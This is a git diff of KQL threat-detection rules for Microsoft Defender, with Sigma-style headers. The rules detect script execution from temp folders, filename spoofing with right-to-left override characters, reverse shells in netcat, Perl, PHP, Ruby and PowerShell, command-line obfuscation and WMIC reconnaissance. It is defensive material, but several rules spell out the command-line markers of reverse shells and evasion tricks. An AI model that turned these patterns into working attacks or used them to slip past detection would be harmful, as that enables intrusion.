+// Description: Detects wscript/cscript executions of scripts located in user directories
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+// False Positives:
+// - Some installers might generate a similar behavior. An initial baseline is required
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe") and (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql
index dac1bc7c..3b9e8ffa 100644
--- a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql
+++ b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql
@@ -1,12 +1,12 @@
-// Title: Potential File Extension Spoofing Using Right-to-Left Override
-// Author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2024-11-17
-// Level: high
-// Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1036.002
-// False Positives:
-// - Filenames that contains scriptures such as arabic or hebrew might make use of this character
-
-DeviceFileEvents
+// Title: Potential File Extension Spoofing Using Right-to-Left Override
+// Author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2024-11-17
+// Level: high
+// Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1036.002
+// False Positives:
+// - Filenames that contains scriptures such as arabic or hebrew might make use of this character
+
+DeviceFileEvents
 | where (FolderPath contains "3pm." or FolderPath contains "4pm." or FolderPath contains "cod." or FolderPath contains "fdp." or FolderPath contains "ftr." or FolderPath contains "gepj." or FolderPath contains "gnp." or FolderPath contains "gpj." or FolderPath contains "ism." or FolderPath contains "lmth." or FolderPath contains "nls." or FolderPath contains "piz." or FolderPath contains "slx." or FolderPath contains "tdo." or FolderPath contains "vsc." or FolderPath contains "vwm." or FolderPath contains "xcod." or FolderPath contains "xslx." or FolderPath contains "xtpp.") and (FolderPath contains "\\u202e" or FolderPath contains "[U+202E]")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql b/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql
index 42d7fd78..12da21c2 100644
--- a/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql
+++ b/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql
@@ -1,12 +1,12 @@
-// Title: Potential Netcat Reverse Shell Execution
-// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-07
-// Level: high
-// Description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Netcat Reverse Shell Execution
+// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-07
+// Level: high
+// Description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -e ") and (FolderPath endswith "/nc" or FolderPath endswith "/ncat") and (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh" or ProcessCommandLine contains "/bin/ash" or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/bsh" or ProcessCommandLine contains "/bin/csh" or ProcessCommandLine contains "/bin/ksh" or ProcessCommandLine contains "/bin/pdksh" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/tcsh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "$IFSash" or ProcessCommandLine contains "$IFSbash" or ProcessCommandLine contains "$IFSbsh" or ProcessCommandLine contains "$IFScsh" or ProcessCommandLine contains "$IFSksh" or ProcessCommandLine contains "$IFSpdksh" or ProcessCommandLine contains 
"$IFSsh" or ProcessCommandLine contains "$IFStcsh" or ProcessCommandLine contains "$IFSzsh") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql b/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql index 33cca89b..5c8bb537 100644 --- a/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql +++ b/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql @@ -1,12 +1,12 @@ -// Title: Potential Perl Reverse Shell Execution -// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-07 -// Level: high -// Description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Perl Reverse Shell Execution +// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-07 +// Level: high +// Description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains "fdopen(" and ProcessCommandLine contains "::Socket::INET") or (ProcessCommandLine contains "Socket" and ProcessCommandLine contains "connect" and ProcessCommandLine contains "open" and ProcessCommandLine contains "exec")) and (ProcessCommandLine contains " -e " and FolderPath endswith "/perl") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql index 809a89fa..f3ac8f24 100644 --- a/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql 
+++ b/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-14
-// Level: medium
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.t1059
-
-DeviceProcessEvents
+// Title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-14
+// Level: medium
+// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_php_reverse_shell.kql b/KQL/rules/Execution/potential_php_reverse_shell.kql
index 72d10fd9..a07b6c4a 100644
--- a/KQL/rules/Execution/potential_php_reverse_shell.kql
+++ b/KQL/rules/Execution/potential_php_reverse_shell.kql
@@ -1,11 +1,11 @@
-// Title: Potential PHP Reverse Shell
-// Author: @d4ns4n_
-// Date: 2023-04-07
-// Level: high
-// Description: Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
-// Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Potential PHP Reverse Shell
+// Author: @d4ns4n_
+// Date: 2023-04-07
+// Level: high
+// Description: Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
+// Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "ash" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "bsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "pdksh" or ProcessCommandLine contains "sh" or ProcessCommandLine contains "tcsh" or ProcessCommandLine contains "zsh") and (ProcessCommandLine contains " -r " and ProcessCommandLine contains "fsockopen") and FolderPath contains "/php"
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql b/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql
index 4526a676..7303a9b9 100644
--- a/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql
+++ b/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql
@@ -1,13 +1,13 @@
-// Title: Potential PowerShell Command Line Obfuscation
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
-// Date: 2020-10-15
-// Level: high
-// Description: Detects the PowerShell command lines with special characters
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1027, attack.t1059.001
-// False Positives:
-// - Amazon SSM Document Worker
-// - Windows Defender ATP
-
-DeviceProcessEvents
+// Title: Potential PowerShell Command Line Obfuscation
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
+// Date: 2020-10-15
+// Level: high
+// Description: Detects the PowerShell command lines with special characters
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1027, attack.t1059.001
+// False Positives:
+// - Amazon SSM Document Worker
+// - Windows Defender ATP
+
+DeviceProcessEvents
 | where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql b/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql
index 072d65ce..977bfd90 100644
--- a/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql
+++ b/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql
@@ -1,10 +1,10 @@
-// Title: Potential PowerShell Obfuscation Via WCHAR/CHAR
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-07-09
-// Level: high
-// Description: Detects suspicious encoded character syntax often used for defense evasion
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027
-
-DeviceProcessEvents
+// Title: Potential PowerShell Obfuscation Via WCHAR/CHAR
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-09
+// Level: high
+// Description: Detects suspicious encoded character syntax often used for defense evasion
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "[char]0x" or ProcessCommandLine contains "(WCHAR)0x"
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql b/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql
index 59b853a3..339c452d 100644
--- a/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql
+++ b/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql
@@ -1,12 +1,12 @@
-// Title: Potential Powershell ReverseShell Connection
-// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-03-03
-// Level: high
-// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - In rare administrative cases, this function might be used to check network connectivity
-
-DeviceProcessEvents
+// Title: Potential Powershell ReverseShell Connection
+// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-03-03
+// Level: high
+// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - In rare administrative cases, this function might be used to check network connectivity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " Net.Sockets.TCPClient" and ProcessCommandLine contains ".GetStream(" and ProcessCommandLine contains ".Write(") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql
index d8a9aad1..a969a81b 100644
--- a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql
@@ -1,14 +1,14 @@
-// Title: Potential Product Class Reconnaissance Via Wmic.EXE
-// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2023-02-14
-// Level: medium
-// Description: Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products.
-// Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms.
-// This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047, attack.discovery, attack.t1082
-// False Positives:
-// - Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispywware products.
-
-DeviceProcessEvents
+// Title: Potential Product Class Reconnaissance Via Wmic.EXE
+// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products.
+// Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms.
+// This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispywware products.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "AntiVirusProduct" or ProcessCommandLine contains "AntiSpywareProduct" or ProcessCommandLine contains "FirewallProduct") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql
index 6d63984f..b5a3d18b 100644
--- a/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potential Product Reconnaissance Via Wmic.EXE
-// Author: Nasreddine Bencherchali
-// Date: 2023-02-14
-// Level: medium
-// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047
-
-DeviceProcessEvents
+// Title: Potential Product Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Product" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains " uninstall" or ProcessCommandLine contains " install")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql b/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql
index afa346a8..eb7c9a45 100644
--- a/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql
+++ b/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential RDP Session Hijacking Activity
-// Author: @juju4
-// Date: 2022-12-27
-// Level: medium
-// Description: Detects potential RDP Session Hijacking activity on Windows systems
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Potential RDP Session Hijacking Activity
+// Author: @juju4
+// Date: 2022-12-27
+// Level: medium
+// Description: Detects potential RDP Session Hijacking activity on Windows systems
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\tscon.exe" or ProcessVersionInfoOriginalFileName =~ "tscon.exe") and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql b/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql
index 050501fc..7b35469e 100644
--- a/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql
+++ b/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potential ReflectDebugger Content Execution Via WerFault.EXE
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-06-30
-// Level: medium
-// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1036
-
-DeviceProcessEvents
+// Title: Potential ReflectDebugger Content Execution Via WerFault.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-30
+// Level: medium
+// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_renamed_rundll32_execution.kql b/KQL/rules/Execution/potential_renamed_rundll32_execution.kql
index 15309365..ee44514b 100644
--- a/KQL/rules/Execution/potential_renamed_rundll32_execution.kql
+++ b/KQL/rules/Execution/potential_renamed_rundll32_execution.kql
@@ -1,12 +1,12 @@
-// Title: Potential Renamed Rundll32 Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-22
-// Level: high
-// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Renamed Rundll32 Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: high
+// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "DllRegisterServer" and (not(FolderPath endswith "\\rundll32.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_ruby_reverse_shell.kql b/KQL/rules/Execution/potential_ruby_reverse_shell.kql
index 1d9b0d62..402db2cf 100644
--- a/KQL/rules/Execution/potential_ruby_reverse_shell.kql
+++ b/KQL/rules/Execution/potential_ruby_reverse_shell.kql
@@ -1,10 +1,10 @@
-// Title: Potential Ruby Reverse Shell
-// Author: @d4ns4n_
-// Date: 2023-04-07
-// Level: medium
-// Description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Potential Ruby Reverse Shell
+// Author: @d4ns4n_
+// Date: 2023-04-07
+// Level: medium
+// Description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh") and (ProcessCommandLine contains " -e" and ProcessCommandLine contains "rsocket" and ProcessCommandLine contains "TCPSocket") and FolderPath contains "ruby"
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql b/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql
index b303daba..2244e747 100644
--- a/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql
+++ b/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql
@@ -1,12 +1,12 @@
-// Title: Potential ShellDispatch.DLL Functionality Abuse
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-06-20
-// Level: medium
-// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential ShellDispatch.DLL Functionality Abuse
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-20
+// Level: medium
+// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql
index 52b1b857..65341000 100644
--- a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql
+++ b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql
@@ -1,12 +1,12 @@
-// Title: Potential Suspicious Browser Launch From Document Reader Process
-// Author: Joseph Kamau
-// Date: 2024-05-27
-// Level: medium
-// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002
-// False Positives:
-// - Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed.
-
-DeviceProcessEvents
+// Title: Potential Suspicious Browser Launch From Document Reader Process
+// Author: Joseph Kamau
+// Date: 2024-05-27
+// Level: medium
+// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\maxthon.exe" or FolderPath endswith "\\seamonkey.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath contains "Acrobat Reader" or InitiatingProcessFolderPath contains "Microsoft Office" or InitiatingProcessFolderPath contains "PDF Reader")) and (not(ProcessCommandLine contains "https://go.microsoft.com/fwlink/")) and (not(((ProcessCommandLine contains "http://ad.foxitsoftware.com/adlog.php") or (ProcessCommandLine contains "https://globe-map.foxitservice.com/go.php" and ProcessCommandLine contains "do=redirect"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql
index e960299f..dbbbbe1e 100644
--- a/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-20
-// Level: medium
-// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047
-
-DeviceProcessEvents
+// Title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " service get " and ProcessCommandLine contains "name,displayname,pathname,startmode") and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql b/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql
index a7e6cfb4..cccb816c 100644
--- a/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql
+++ b/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql
@@ -1,12 +1,12 @@
-// Title: Potential WinAPI Calls Via CommandLine
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-06
-// Level: high
-// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1106
-// False Positives:
-// - Some legitimate action or applications may use these functions. Investigate further to determine the legitimacy of the activity.
-
-DeviceProcessEvents
+// Title: Potential WinAPI Calls Via CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-06
+// Level: high
+// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1106
+// False Positives:
+// - Some legitimate action or applications may use these functions. Investigate further to determine the legitimacy of the activity.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "AddSecurityPackage" or ProcessCommandLine contains "AdjustTokenPrivileges" or ProcessCommandLine contains "Advapi32" or ProcessCommandLine contains "CloseHandle" or ProcessCommandLine contains "CreateProcessWithToken" or ProcessCommandLine contains "CreatePseudoConsole" or ProcessCommandLine contains "CreateRemoteThread" or ProcessCommandLine contains "CreateThread" or ProcessCommandLine contains "CreateUserThread" or ProcessCommandLine contains "DangerousGetHandle" or ProcessCommandLine contains "DuplicateTokenEx" or ProcessCommandLine contains "EnumerateSecurityPackages" or ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "FreeLibrary" or ProcessCommandLine contains "GetDelegateForFunctionPointer" or ProcessCommandLine contains "GetLogonSessionData" or ProcessCommandLine contains "GetModuleHandle" or ProcessCommandLine contains "GetProcAddress" or ProcessCommandLine contains "GetProcessHandle" or ProcessCommandLine contains "GetTokenInformation" or ProcessCommandLine contains "ImpersonateLoggedOnUser" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "LoadLibrary" or ProcessCommandLine contains "memcpy" or ProcessCommandLine contains "MiniDumpWriteDump" or ProcessCommandLine contains "ntdll" or ProcessCommandLine contains "OpenDesktop" or ProcessCommandLine contains "OpenProcess" or ProcessCommandLine contains 